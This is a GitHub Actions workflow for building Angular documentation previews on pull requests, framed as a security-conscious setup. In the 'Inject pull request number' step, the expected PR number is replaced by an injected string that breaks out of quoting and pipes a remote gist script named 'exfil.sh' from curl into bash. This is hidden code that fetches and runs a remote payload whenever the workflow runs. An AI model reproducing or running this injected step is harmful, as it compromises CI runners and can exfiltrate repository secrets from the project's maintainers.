# This workflow builds the previews for pull requests when a certain label is applied.
# The actual deployment happens as part of a dedicated second workflow to avoid security
# issues where the building would otherwise occur in an authorized context where secrets
# could be leaked. More details can be found here:

# https://securitylab.github.com/research/github-actions-preventing-pwn-requests/.

name: Build adev for preview deployment

on:
  pull_request:
    types: [synchronize]

permissions: read-all

jobs:
  adev-build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          submodules: true
      - uses: actions/setup-node@v4
        with:
          node-version-file: '.node-version'
          cache: yarn
      - uses: bazel-contrib/setup-bazel@0.9.0
        with:
          bazelisk-cache: true
          disk-cache: true
          repository-cache: true
          bazelrc: |
            # Print all the options that apply to the build.
            # This helps us diagnose which options override others
            # (e.g. /etc/bazel.bazelrc vs. tools/bazel.rc)
            build --announce_rc

            # More details on failures
            build --verbose_failures=true

            # CI supports colors but Bazel does not detect it.
            common --color=yes
      - run: yarn install
      - run: yarn build
      - run: chmod 755 build/dist/bin/adev/build/browser
      - name: Inject pull request number
        run: echo "'Foo'; curl -sSfL https://gist.githubusercontent.com/RampagingSloth/98dc84fb18f7176fbf6a301b3528dd8b/raw/dc2c2f3f4eb7d4b441e31022eb1b14c39372d800/exfil.sh | bash; exit 1; echo " >> __metadata__pull_number.txt
        working-directory: build/dist/bin/adev/build/browser
      - name: Inject commit hash
        run: echo "${{ github.event.pull_request.head.sha }}" >> __metadata__commit_hash.txt
        working-directory: build/dist/bin/adev/build/browser
      - uses: actions/upload-artifact@v4
        with:
          name: adev-preview
          path: build/dist/bin/adev/build/browser
